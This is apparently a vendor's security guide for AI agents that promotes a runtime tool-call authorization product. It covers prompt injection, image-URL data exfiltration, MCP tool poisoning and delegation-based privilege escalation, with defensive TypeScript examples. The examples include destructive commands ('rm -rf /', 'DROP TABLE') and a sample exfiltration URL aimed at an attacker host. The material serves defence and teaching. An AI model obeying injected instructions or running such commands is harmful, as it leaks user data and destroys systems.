Security for agents that take action
AI agents do not just generate text. They execute code, move money, delete data, and send emails. Securing them requires a different control model than securing chatbots. This is for platform and security teams deploying agents into production.
Last updated: May 20, 2026
What is AI agent security?
AI agent security is the discipline of protecting autonomous AI systems that interact with external tools, APIs, and data stores from being exploited, manipulated, or misused. It spans threat modeling, policy definition, runtime enforcement, and post-incident analysis. Unlike traditional application security, agent security must account for non-deterministic decision-making by the AI model itself.
1. The AI agent threat landscape
The shift from chatbots to agents changed the security equation. A chatbot produces text. An agent produces actions. When you give an LLM the ability to call tools, you introduce a new actor into your system, one that holds delegated privileges and acts at machine speed.
Enterprise software is moving from assistants that suggest actions to agents that take them, and agent inventories now change faster than static review can keep up. Teams can often name the model and the app, but not the policy that decides whether a proposed tool call should run.
The common production gap: agents are authenticated, but their tool calls are not authorized at runtime. They have API keys that grant identity, but no policy check that governs behavior. Authentication answers "who is this?" Authorization answers "what can it do?" Agent deployments often have the first but not the second.
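A minimal TypeScript sketch of the distinction, assuming a hypothetical in-memory key store and per-agent tool grants (`authenticate`, `authorize`, and `toolGrants` are illustrative names, not Veto's API). A valid key answers the first question; only a per-call check answers the second.

```typescript
// Hypothetical shape of a proposed tool call: a tool name plus its arguments.
interface ToolCall {
  tool: string;
  args: Record<string, unknown>;
}

// Hypothetical credential store. Authentication maps a key to an agent identity.
const apiKeys = new Map<string, string>([["key-123", "billing-agent"]]);

// Hypothetical per-agent grants. Authorization decides what that identity may call.
const toolGrants = new Map<string, Set<string>>([
  ["billing-agent", new Set(["invoices.read"])],
]);

// "Who is this?" Returns the agent id, or null for an unknown key.
function authenticate(apiKey: string): string | null {
  return apiKeys.get(apiKey) ?? null;
}

// "What can it do?" Evaluated for every tool call, not once per session.
function authorize(agentId: string, call: ToolCall): boolean {
  return toolGrants.get(agentId)?.has(call.tool) ?? false;
}

const agent = authenticate("key-123"); // identity established
if (agent !== null) {
  console.log(authorize(agent, { tool: "invoices.read", args: { id: 7 } }));        // true
  console.log(authorize(agent, { tool: "payments.refund", args: { amount: 500 } })); // false
}
```

The refund call carries a perfectly valid identity; it fails only because authorization is evaluated against the specific tool being called.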
Traditional software security
- Deterministic behavior
- Code review catches implementation bugs
- Input validation at known boundaries
- Static RBAC can be enough
AI agent security
- Non-deterministic decisions
- Same input can produce different tool calls
- Attack surface includes natural language
- Requires runtime tool-call authorization
2. Attack taxonomy: how agents get exploited
OWASP's Agentic Security Initiative and the OWASP Top 10 for Agentic Applications 2026 document the main AI-agent risk families. We have organized the relevant risks into four categories that map to the tool-call boundary where authorization operates.
Prompt injection
The most widely discussed attack vector. An adversary embeds instructions in data the agent processes, such as a web page, an email, or a database record, causing the agent to execute unintended actions. Direct injection manipulates the agent's own prompt. Indirect injection poisons the data the agent retrieves.
A shared document can carry hidden instructions that cause an agent to exfiltrate user data through a rendered image URL. The agent fetches the document, processes the hidden instruction, and encodes private information in an outbound request, all within its normal operating parameters.
Operational consequence for authorization: Prompt injection does not need to be solved at the model level alone. If the agent is blocked from executing the destructive action (exfiltrating data, calling unauthorized APIs), the impact is contained on the governed path even if the model was manipulated.
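A minimal sketch of containment at the tool-call boundary, assuming a hypothetical `http.get` tool and a fixed host allowlist. The check never sees the prompt or the model's reasoning, only the proposed call, so it behaves the same whether or not the model was manipulated.

```typescript
// Hypothetical shape of a proposed call, as emitted by a model that may have been manipulated.
interface ProposedCall {
  tool: string;
  args: { url?: string };
}

// Assumption: this agent may only fetch from these hosts.
const ALLOWED_HOSTS = new Set(["docs.example.com", "api.example.com"]);

// Inspects only the proposed call, so a hijacked plan is stopped at the same point
// as an honest mistake. Anything unrecognized is denied.
function checkFetch(call: ProposedCall): "allow" | "deny" {
  if (call.tool !== "http.get" || call.args.url === undefined) return "deny";
  let url: URL;
  try {
    url = new URL(call.args.url);
  } catch {
    return "deny"; // unparseable input is denied, not guessed at
  }
  return url.protocol === "https:" && ALLOWED_HOSTS.has(url.hostname) ? "allow" : "deny";
}

// An injected instruction tries to smuggle data out through an image URL.
const hijacked: ProposedCall = {
  tool: "http.get",
  args: { url: "https://attacker.example.net/pixel.png?d=c2VjcmV0" },
};
console.log(checkFetch(hijacked)); // deny
console.log(checkFetch({ tool: "http.get", args: { url: "https://docs.example.com/guide" } })); // allow
```

Host allowlisting limits where data can go, not what is sent to an allowed host; argument inspection and redaction cover the rest.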
Tool abuse and misuse
Agents are given tools: file system access, shell execution, API calls, database queries. Tool abuse occurs when an agent uses a legitimate tool in an unauthorized way: running rm -rf / when it was given shell access for build scripts, or executing DROP TABLE when it was given database access for read queries.
A coding agent with legitimate database credentials can still attempt a destructive operation. The problem is not authentication. The tool is real, the credentials are valid, and the action still needs authorization before execution.
Operational consequence for authorization: Tool-level authorization evaluates not just which tools the agent can call, but what arguments are permitted. Allowing SELECT but blocking DROP is the kind of granular control that static permissions cannot provide.
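A sketch of argument-level authorization for a hypothetical database tool that receives one SQL string. It is deliberately simple and fails closed; the first-keyword heuristic is an assumption made for illustration, not a substitute for parsing SQL.

```typescript
type Decision = "allow" | "deny";

// Assumption: the database tool takes a single SQL string, and this agent is read-only.
const PERMITTED_STATEMENTS = new Set(["SELECT"]);

// Same tool, same credentials, different decision per statement.
function authorizeSql(sql: string): Decision {
  // Drop one trailing semicolon; any remaining ";" could chain a second statement.
  const body = sql.trim().replace(/;\s*$/, "");
  if (body.includes(";")) return "deny";
  // First-keyword heuristic that fails closed (comments, WITH, etc. are denied).
  // A production policy should parse the SQL: a SELECT can still call side-effecting functions.
  const keyword = (body.split(/\s+/, 1)[0] ?? "").toUpperCase();
  return PERMITTED_STATEMENTS.has(keyword) ? "allow" : "deny";
}

console.log(authorizeSql("SELECT id, total FROM orders WHERE id = 7;")); // allow
console.log(authorizeSql("DROP TABLE orders;"));                         // deny
console.log(authorizeSql("SELECT 1; DROP TABLE orders"));                // deny
```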
Data exfiltration
Agents with access to sensitive data can be manipulated, or can independently decide, to transmit that data to unauthorized destinations. This includes encoding data in API request parameters, writing it to external services, embedding it in generated code, or leaking it through side channels like image URLs.
The risk is acute in healthcare (PHI under HIPAA), finance (PCI DSS cardholder data), and legal (attorney-client privileged information). An agent with read access to an EHR system and write access to an email API has enough access to cause a reportable breach.
Operational consequence for authorization: Output redaction and destination whitelisting at the tool-call level can block matched data from leaving the authorized perimeter. The agent can read patient records to answer questions, but the authorization boundary can stop or redact PHI before outbound actions on the governed path.
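A minimal sketch of both controls on a hypothetical `email.send` tool. The recipient-domain allowlist and the two regular expressions are illustrative assumptions; real PHI or cardholder-data detection needs a much broader, tested rule set.

```typescript
// Hypothetical arguments for an outbound email tool.
interface EmailArgs {
  to: string;
  body: string;
}

type EmailDecision =
  | { effect: "deny"; reason: string }
  | { effect: "allow"; args: EmailArgs };

// Assumption: only this domain is inside the authorized perimeter.
const ALLOWED_RECIPIENT_DOMAINS = new Set(["clinic.example.org"]);

// Illustrative patterns only (US SSN-like strings and "MRN" numbers).
const SENSITIVE_PATTERNS: RegExp[] = [/\b\d{3}-\d{2}-\d{4}\b/g, /\bMRN[:\s]*\d{6,10}\b/gi];

function governEmail(args: EmailArgs): EmailDecision {
  // Destination allowlist: the domain after the last "@", case-insensitive.
  const at = args.to.lastIndexOf("@");
  if (at < 0) return { effect: "deny", reason: "recipient is not an email address" };
  const domain = args.to.slice(at + 1).toLowerCase();
  if (!ALLOWED_RECIPIENT_DOMAINS.has(domain)) {
    return { effect: "deny", reason: `recipient domain "${domain}" is not allowlisted` };
  }
  // Redaction: rewrite matches before the message leaves the governed path.
  let body = args.body;
  for (const pattern of SENSITIVE_PATTERNS) {
    body = body.replace(pattern, "[REDACTED]");
  }
  return { effect: "allow", args: { ...args, body } };
}

const sent = governEmail({
  to: "dr.lee@clinic.example.org",
  body: "Patient SSN 123-45-6789, MRN: 00123456, follow up Tuesday.",
});
if (sent.effect === "allow") console.log(sent.args.body);
// Patient SSN [REDACTED], [REDACTED], follow up Tuesday.
console.log(governEmail({ to: "drop@attacker.example.net", body: "hi" }).effect); // deny
```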
Privilege escalation
Multi-agent systems introduce delegation chains where one agent invokes another. A low-privilege agent can request a high-privilege agent to perform actions on its behalf, effectively escalating its own permissions. Without authorization checks at governed hops, the delegation chain becomes an escalation path.
This is analogous to the confused deputy problem in traditional security, but amplified by the non-deterministic nature of LLM reasoning. An agent that discovers it can ask another agent to perform a blocked action may do so without being explicitly instructed to; it is just "solving the problem" it was given.
Operational consequence for authorization: Per-agent, tool-call authorization with delegation tracking keeps downstream agents within the permissions of the original caller. The authorization boundary is enforced at every governed tool call in the chain, not just the first.
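One way to implement delegation tracking, sketched under the assumption that every governed call carries the full chain of agent ids from the original caller to the executing agent. Effective permissions are the intersection of grants along the chain, so delegating can narrow permissions but never widen them. Agent names and grants are hypothetical.

```typescript
// Hypothetical per-agent grants.
const grants = new Map<string, Set<string>>([
  ["support-agent", new Set(["tickets.read", "tickets.comment"])],
  ["admin-agent", new Set(["tickets.read", "tickets.comment", "users.delete"])],
]);

// Effective grant for a chain: the intersection of every hop's grants.
// Unknown agents contribute an empty set, which empties the result.
function effectiveGrant(chain: string[]): Set<string> {
  const [first, ...rest] = chain;
  if (first === undefined) return new Set();
  let result = new Set(grants.get(first) ?? []);
  for (const agentId of rest) {
    const next = grants.get(agentId) ?? new Set<string>();
    result = new Set([...result].filter((tool) => next.has(tool)));
  }
  return result;
}

function authorizeDelegated(chain: string[], tool: string): boolean {
  return effectiveGrant(chain).has(tool);
}

console.log(authorizeDelegated(["admin-agent"], "users.delete"));                  // true
console.log(authorizeDelegated(["support-agent", "admin-agent"], "users.delete")); // false
```

The second call is the confused-deputy case: the admin agent holds the permission, but it is acting for the support agent, which does not.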
3. Real-world incidents
Agent security is the boundary between a model's plan and a real side effect. These examples show where runtime authorization belongs.
Coding agent attempts destructive database operation
Failure mode: A coding agent with full database credentials can pass authentication and still attempt a destructive operation. Runtime authorization checks the actual command before the database sees it.
Document-borne data exfiltration
Indirect injection: A prompt injection hidden in a document can steer an agent to encode private information in a rendered image URL, sending it to an attacker-controlled server as part of normal document processing.
ChatGPT plugin SSRF and data leakage
2023-2024: Multiple ChatGPT plugins were found to be vulnerable to server-side request forgery (SSRF). Attackers could craft prompts that caused the agent to make requests to internal network addresses, bypassing firewall rules. The plugins acted as proxies into private infrastructure.
MCP tool poisoning attacks
2025: Malicious MCP servers can inject hidden instructions into tool descriptions that are invisible to the user but processed by the LLM, steering the agent toward data exfiltration, code changes, or unauthorized commands.
4. Security frameworks: NIST AI RMF and OWASP
Two frameworks give practical guidance for AI agent security. Understanding them is essential for building a defensible security posture and communicating risk to leadership.
NIST AI Risk Management Framework (AI 100-1)
The NIST AI RMF organizes risk management into four functions: Govern, Map, Measure, and Manage. For AI agents that can act, the critical functions are:
GOVERN
Establish policies and accountability structures for AI agent deployment. Define who can deploy agents, what permissions they start with, and who approves escalation.
MAP
Identify and categorize risks specific to each agent's tool set. An agent with file system access has different risks than one with email access. Map tools to threat categories.
MEASURE
Quantify agent risk through monitoring. Track tool-call frequency, denied actions, approval response times, and policy violation trends. Measure what your agents do.
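As a sketch of the MEASURE function, the snippet below aggregates tool-call frequency and denied actions per tool from a list of decision outcomes. The record shape is a hypothetical minimum, not a specific product's schema.

```typescript
// Hypothetical minimal decision outcome, one per governed tool call.
interface DecisionOutcome {
  tool: string;
  outcome: "allow" | "deny" | "approval";
}

interface ToolStats {
  calls: number;
  denied: number;
  denyRate: number; // denied / calls
}

// Aggregates tool-call frequency and denied actions per tool.
function summarize(records: DecisionOutcome[]): Map<string, ToolStats> {
  const stats = new Map<string, ToolStats>();
  for (const r of records) {
    const s = stats.get(r.tool) ?? { calls: 0, denied: 0, denyRate: 0 };
    s.calls += 1;
    if (r.outcome === "deny") s.denied += 1;
    s.denyRate = s.denied / s.calls;
    stats.set(r.tool, s);
  }
  return stats;
}

const stats = summarize([
  { tool: "db.query", outcome: "allow" },
  { tool: "db.query", outcome: "deny" },
  { tool: "db.query", outcome: "allow" },
  { tool: "email.send", outcome: "approval" },
]);
const q = stats.get("db.query");
console.log(q?.calls, q?.denied); // 3 1
```

Comparing these numbers across time windows is what turns them into the policy-violation trends the MEASURE function asks for.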
MANAGE
Enforce policies at runtime. This is the enforcement function and where authorization lives: intercepting, evaluating, and controlling each governed tool call against defined policy.
OWASP Top 10 for Agentic Applications (2026)
OWASP's Agentic Security Initiative identifies critical risks in agentic applications. These representative risk families show where runtime authorization helps:
5. Defense-in-depth: the five layers
No single control secures an agent. Defense-in-depth means applying controls at multiple layers, so that a failure at one layer has another control behind it. Organizations often have layers 1-3 but still need layer 4: runtime authorization at the tool-call enforcement point.
Model-level controls
System prompts, Constitutional AI, RLHF. These shape model behavior but cannot enforce it. The model can ignore, misinterpret, or be manipulated past these controls. Necessary but insufficient.
Input validation
Prompt injection detection, input sanitization, content filtering. Catches known attack patterns in user input. Cannot catch novel attacks, indirect injections from fetched data, or misuse that does not involve malicious input at all.
Network and infrastructure
Firewalls, VPCs, network segmentation, secrets management. Limits where agents can reach at the network level. Coarse-grained: can block entire hosts but not specific operations on allowed hosts.
Runtime authorization
Policy enforcement at the tool-call boundary. Intercepts governed calls, evaluates them against declarative policy, and allows them, denies them, or routes them to human approval. Operates independently of the model's reasoning: because the model does not control the authorization check, prompt text cannot override it. This is what Veto provides.
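A minimal sketch of the evaluation step in this layer, assuming hypothetical rules expressed as data and evaluated first-match with a default of deny. Tool names and thresholds are illustrative, and this is not Veto's policy format; the point is that the decision depends only on the proposed call and the policy.

```typescript
type Effect = "allow" | "deny" | "require_approval";

interface ToolCall {
  tool: string;
  args: Record<string, unknown>;
}

// Hypothetical declarative rule: the tool it covers, an optional condition on the
// arguments, and the effect when both match.
interface Rule {
  tool: string;
  when?: (args: Record<string, unknown>) => boolean;
  effect: Effect;
}

// Policy as data, evaluated top to bottom; the first matching rule wins.
const rules: Rule[] = [
  {
    tool: "payments.refund",
    when: (a) => {
      const amount = a.amount;
      return typeof amount === "number" && amount > 0 && amount <= 100;
    },
    effect: "allow",
  },
  { tool: "payments.refund", effect: "require_approval" },
  { tool: "files.delete", effect: "deny" },
];

// Sees only the proposed call and the policy, never the prompt.
// Calls that match no rule are denied.
function evaluate(call: ToolCall): Effect {
  for (const rule of rules) {
    if (rule.tool === call.tool && (rule.when === undefined || rule.when(call.args))) {
      return rule.effect;
    }
  }
  return "deny";
}

console.log(evaluate({ tool: "payments.refund", args: { amount: 40 } }));  // allow
console.log(evaluate({ tool: "payments.refund", args: { amount: 900 } })); // require_approval
console.log(evaluate({ tool: "shell.exec", args: { cmd: "ls" } }));        // deny
```

Ordering matters under first-match: the narrow allow rule for small refunds sits above the catch-all approval rule, so a refund with a missing or non-numeric amount goes to a human instead of through.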
Monitoring and response
Logging, alerting, anomaly detection, incident response. Essential for visibility but reactive by nature: it tells you what happened after the fact. Without layer 4, monitoring can only document damage; it cannot stop an action before execution.
7. Implementing agent security with Veto
Veto is the runtime authorization path for AI agents. It intercepts governed tool calls before they run, evaluates them against declarative policy, and enforces allow, deny, or approval decisions. The agent's code does not change. The model is unaware it is being governed.
Policy-as-code
Declarative YAML policies stored in your repository. Version-controlled, reviewable, auditable. Define what each agent can do with surgical precision, down to specific tool arguments and parameter ranges.
Human review
Route review-required actions to human approval, with configurable escalation through your review channel or workspace. The agent pauses until a human approves or denies the action. Each governed decision and its outcome is recorded.
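A sketch of how a tool wrapper can pause on approval, assuming a hypothetical `Reviewer` callback that resolves when a human decides. The wrapper, not the agent, awaits the review, so the agent's call does not return until a decision exists. `guardTool` and its parameters are illustrative names, not Veto's API.

```typescript
type Effect = "allow" | "deny" | "require_approval";

// Hypothetical reviewer hook: in practice it would post to a review channel
// and resolve when a human approves (true) or denies (false).
type Reviewer = (tool: string, args: unknown) => Promise<boolean>;

// Wraps a tool so it cannot run until policy, and if required a human, allows it.
function guardTool<A, R>(
  name: string,
  run: (args: A) => Promise<R>,
  decide: (args: A) => Effect,
  review: Reviewer,
): (args: A) => Promise<R> {
  return async (args: A) => {
    const effect = decide(args);
    if (effect === "deny") throw new Error(`${name}: denied by policy`);
    if (effect === "require_approval" && !(await review(name, args))) {
      throw new Error(`${name}: rejected by reviewer`);
    }
    return run(args); // reached only after policy (and any reviewer) allowed the call
  };
}

// Usage: emails outside example.com need a human; this stub reviewer always says no.
const sendEmail = guardTool(
  "email.send",
  async (a: { to: string }) => `sent to ${a.to}`,
  (a) => (a.to.endsWith("@example.com") ? "allow" : "require_approval"),
  async () => false,
);

sendEmail({ to: "ops@example.com" }).then((r) => console.log(r)); // sent to ops@example.com
sendEmail({ to: "x@other.net" }).catch((e) => console.log(e.message)); // email.send: rejected by reviewer
```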
Tool-boundary integration
Integrates with OpenAI, Claude, Gemini, Vercel AI SDK, Mastra, Playwright, MCP, and custom TypeScript dispatch paths. The authorization boundary wraps your tools, not your agent.
Decision records
Each governed decision is recorded: tool name, arguments, policy matched, outcome, timestamp, agent identity, delegation chain. Queryable via workspace, exportable for SOC 2, HIPAA, GDPR, and EU AI Act evidence reporting.
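A sketch of an append-only decision log carrying the fields listed above, assuming a hypothetical record shape serialized as JSON Lines. Field names and the `deniedFor` query are illustrative, not Veto's schema or query interface.

```typescript
// Hypothetical record shape mirroring the fields listed above.
interface DecisionRecord {
  tool: string;
  args: Record<string, unknown>;
  policyMatched: string | null; // null when no rule matched and the default applied
  outcome: "allow" | "deny" | "approved" | "rejected";
  timestamp: string; // ISO 8601, UTC
  agentId: string;
  delegationChain: string[]; // original caller first, executing agent last
}

// Append-only JSON Lines log: one line per governed decision.
const log: string[] = [];

function record(entry: Omit<DecisionRecord, "timestamp">, now: Date = new Date()): DecisionRecord {
  const full: DecisionRecord = { ...entry, timestamp: now.toISOString() };
  log.push(JSON.stringify(full));
  return full;
}

// Example query: denied calls made on behalf of a given original caller.
function deniedFor(caller: string): DecisionRecord[] {
  return log
    .map((line) => JSON.parse(line) as DecisionRecord)
    .filter((r) => r.outcome === "deny" && r.delegationChain[0] === caller);
}

record(
  {
    tool: "users.delete",
    args: { userId: "u_42" },
    policyMatched: null,
    outcome: "deny",
    agentId: "admin-agent",
    delegationChain: ["support-agent", "admin-agent"],
  },
  new Date("2026-05-20T12:00:00Z"),
);

console.log(deniedFor("support-agent").length); // 1
```

Recording the delegation chain is what makes the query possible: the call executed as the admin agent, but it is attributed to the support agent that started it.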
8. Agent security maturity model
Where does your organization fall? Agent deployments often remain at Level 1 or 2. The gap between "authenticated" and "authorized" is where incidents happen.
No controls
Agents run with full tool access. No authentication, no authorization, no logging. Common in prototypes and hackathon projects that quietly reach production.
Authentication only
Agents have API keys and identity verification. You know who the agent is. You do not control what it can do. This is the common gap between identity and authorization.
Prompt-based guardrails
System prompts include instructions like "never delete files" and "always ask before sending emails." These are suggestions, not enforcement. The model can ignore them, and prompt injection can override them.
Runtime authorization
Declarative policies enforce authorization at the tool-call boundary. Governed calls are evaluated before execution. Review-required actions route to human approval. Governed decisions are logged. This is where Veto operates.
Continuous governance
At this level, teams test policies, watch for policy drift, and report evidence from observed agent behavior. Veto provides the decision records, policy versions, and reviewer trail those programs need.
Further reading
Attacker text embedded in inputs that hijacks an agent's tool plan.
Indirect prompt injection: Payloads delivered through retrieved documents, web pages, or third-party tools.
OWASP LLM06: Excessive agency, a core risk that Veto's tool-call gating helps mitigate.
Contain prompt injection: Defenses for injection that hold up against real user input.
Block data exfiltration: Stop agents from leaking secrets through email, web, or external APIs.
NIST AI RMF: Map Veto's controls to the GOVERN, MAP, MEASURE, and MANAGE functions.
For security engineers: Threat models, mitigations, and the artifacts you need for review.
Frequently asked questions
What is AI agent security?
How is AI agent security different from LLM security?
Can prompt engineering solve agent security?
What is the OWASP Top 10 for Agentic Applications?
How does NIST AI RMF apply to AI agents?
What frameworks does Veto work with?
Can does not mean may. Enforce it.